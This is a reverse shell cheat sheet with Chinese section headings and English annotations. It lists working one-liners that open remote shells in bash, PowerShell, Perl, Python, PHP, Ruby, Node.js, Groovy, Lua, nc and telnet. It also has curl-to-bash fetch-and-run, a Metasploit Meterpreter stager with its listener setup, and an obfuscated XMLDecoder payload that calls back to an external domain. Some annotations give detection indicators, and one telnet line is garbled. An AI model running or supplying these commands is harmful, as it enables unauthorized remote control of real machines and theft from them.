Linux反弹shell
bash
# Reverse shell through bash's /dev/tcp pseudo-path: connects to 192.168.0.135:4444 and
# attaches an interactive bash, with stdin/stdout/stderr, to that socket.
# /dev/tcp is a bash feature, not a real device file. Indicator: a bash process whose
# fds 0/1/2 are a socket (visible under /proc/<pid>/fd); egress filtering blocks the callback.
bash -i >& /dev/tcp/192.168.0.135/4444 0>&1
curl
# Fetches a script over plaintext HTTP and pipes it straight into bash — no TLS, no
# integrity check. Indicator: a bash process whose stdin is a pipe from curl/wget, plus the
# outbound HTTP request itself.
curl 192.168.0.135/shell | bash
shell文件内容
# Contents of the served "shell" file: the same /dev/tcp reverse shell to 192.168.0.135:4444.
bash -i >& /dev/tcp/192.168.0.135/4444 0>&1
exec
# Reverse shell without a pty: fd 5 is opened read/write on a TCP connection to
# 192.168.0.135:4444; each received line is word-split and executed, with stdout and
# stderr sent back into fd 5. Indicator: a bash process with fd 5 bound to a remote socket.
exec 5<>/dev/tcp/192.168.0.135/4444;cat <&5 | while read line; do $line 2>&5 >&5; done
# Same loop, but `read` takes its input from fd 5 directly instead of from the cat pipe.
exec 5<>/dev/tcp/192.168.0.135/4444;cat <&5 | while read line 0<&5; do $line 2>&5 >&5; done
AWK
# gawk-only reverse shell: "/inet/tcp/0/HOST/PORT" is gawk's TCP special file. It prints a
# "shell>" prompt, reads one line as a command, runs it via getline and streams the output
# back; the inner loop ends on "exit", after which the outer while(42) reconnects forever.
# Indicator: an awk process holding a remote TCP socket.
awk 'BEGIN {s = "/inet/tcp/0/192.168.0.135/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
Windows反弹shell
# PowerShell reverse shell: TCPClient to 192.168.0.135:4444, reads bytes from the stream,
# runs them with Invoke-Expression (iex) and writes the output plus a "PS <cwd>> " prompt back.
# -nop skips the profile. Script Block Logging (event 4104) and AMSI see the iex'd text at
# execution time; network telemetry shows powershell.exe holding the outbound connection.
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.0.135',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
MSF反弹shell
Windows反弹shell
# Builds a 64-bit Windows Meterpreter reverse_tcp stager in "psh-reflection" (PowerShell) form
# that calls back to LHOST:LPORT; output is written to xxx.ps1. The angle-bracket values are
# placeholders to fill in. The resulting script is plain PowerShell, so Script Block Logging
# and AMSI observe it when run, and it connects to a single fixed host:port.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<当前监听者IP> LPORT=<监听者端口> -f psh-reflection > xxx.ps1
将ps1文件移动到站点目录下
开启msf并进行端口监听配置
# Listener side: multi/handler waits for the reverse connection. payload, lhost and lport
# must match the values baked into the generated stager (here 192.168.253.129:19111,
# which differs from the 192.168.0.135:4444 used elsewhere on this page).
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.253.129
set lport 19111
# "exploit" and "run" are equivalent commands; type one of them.
exploit/run
通过powershell执行该文件
Linux反弹shell
详情可参考:MSF –Linux后门之elf文件
不同语言反弹shell
perl
# Socket-based form: connects to 192.168.0.135:4444, redirects STDIN/STDOUT/STDERR onto the
# socket and exec's an interactive /bin/sh. The trailing /* ... */ text on these lines is the
# author's annotation, not shell syntax (copied literally it becomes a glob argument).
perl -e 'use Socket;$i="192.168.0.135";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' /*linux可以这样写*/
# IO::Socket form: forks (parent exits), then reads lines from the socket and passes each to
# system(). "attackerip" is a placeholder for the listener host.
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' /*linux可以这样写*/
# Byte-identical to the line above despite the "windows" label; only the annotation differs.
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' /*windows可以这样写*/
#又或者直接写个pl文件也可以
#1.pl
# 1.pl: the Socket-based reverse shell from the one-liner, as a script.
# x.x.x.x is the listener address placeholder; the port is 4444.
use Socket;
$i="x.x.x.x";
$p=4444;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i))))
{
# On a successful connect, the three standard streams are redirected to the socket
# and /bin/sh -i replaces the perl process.
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
};
python
# Python: connects a socket to 192.168.0.135:4444, dup2()s it over fds 0/1/2, then runs
# /bin/sh -i. Indicator: a python process whose fds 0-2 are a socket, parenting an sh.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.135",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php
# PHP: fsockopen() to 192.168.0.135:4444, then exec's /bin/sh -i with its streams redirected to
# fd 3 — i.e. it relies on the socket being fd 3 of the php process.
php -r '$sock=fsockopen("192.168.0.135",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby
# Ruby: opens a TCPSocket to 192.168.0.135:4444 and substitutes its descriptor number (to_i)
# into the redirections of the exec'd /bin/sh, so it does not depend on the socket being fd 3.
ruby -rsocket -e'f=TCPSocket.open("192.168.0.135",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
javascript
// Node.js: reaches the Function constructor via this.constructor.constructor, uses it to get
// `process` and the real require() (process.mainModule.require), then spawns bash synchronously
// with a /dev/tcp reverse shell (ip/port are placeholders). This constructor-chain pattern is
// what an expression-sandbox / template-engine escape looks like in application logs.
c='constructor';this[c][c]("c='constructor';require=this[c][c]('return process')().mainModule.require;var sync=require('child_process').spawnSync; var ls = sync('bash', ['-c','bash -i >& /dev/tcp/ip/port 0>&1'],); console.log(ls.output.toString());")()
java
// Groovy syntax (`[...] as String[]`, no types) despite the "java" heading: Runtime.exec() runs
// bash -c with the fd-5 /dev/tcp loop shown earlier on this page, then waits for it to finish.
// Indicator: a JVM process spawning /bin/bash with a /dev/tcp argument.
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.135/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
lua
# Lua (LuaSocket): connects to 192.168.0.135:4444 and, like the php variant, assumes the socket
# is fd 3 of the lua process when it runs /bin/sh -i with fds redirected to it.
lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.0.135','4444');os.execute('/bin/sh -i <&3 >&3 2>&3');"
其他反弹shell
nc
# nc with -e: connects to 192.168.0.135:4444 and hands the connection to /bin/sh.
# The trailing /* ... */ text is the author's annotation, not shell syntax.
nc -e /bin/sh 192.168.0.135 4444 /*有的发行版linux没有-e的参数*/
# Two-connection variant for nc builds without -e: commands arrive on port 4444, output leaves
# on port 5555. Indicator: a bash process whose stdin and stdout are pipes from/to two nc processes.
nc 192.168.0.135 4444 | /bin/bash | nc 192.168.0.135 5555 /*如果nc没有-e的参数*/
telnet
# As printed this line is not valid shell (`&&&&`, and the redirection operators around /tmp/p
# are missing) — most likely an extraction artifact. It is the named-pipe (mknod ... p) form of
# the two-connection trick; "attackerip" is a placeholder. Indicator: a FIFO under /tmp in use
# by a telnet process.
rm -f /tmp/p; mknod /tmp/p p &&&& telnet attackerip 4444 0/tmp/p
# Two-connection variant with both legs to port 4444 (the nc form above uses 4444 and 5555).
telnet attackerip 4444 | /bin/bash | telnet attackerip 4444
xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- java.beans.XMLDecoder document: decoding it constructs a ProcessBuilder for
     ["/bin/bash", "-c", <payload>] and invokes start(), so XMLDecoder must never be fed
     untrusted input. The payload uses brace expansion ({echo,...}|{base64,-d}|{bash,-i}) to
     avoid literal spaces; the base64 decodes to
     bash -c 'bash -i >& /dev/tcp/38dm225749.51vip.biz/27879 0>&1'
     an external callback host, unlike the 192.168.x.x addresses elsewhere on this page —
     treat that host and port as indicators. -->
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>{echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8zOGRtMjI1NzQ5LjUxdmlwLmJpei8yNzg3OSAwPiYxJw}|{base64,-d}|{bash,-i}</string>
</void>
</array>
<void method="start"/>
</object>
</java>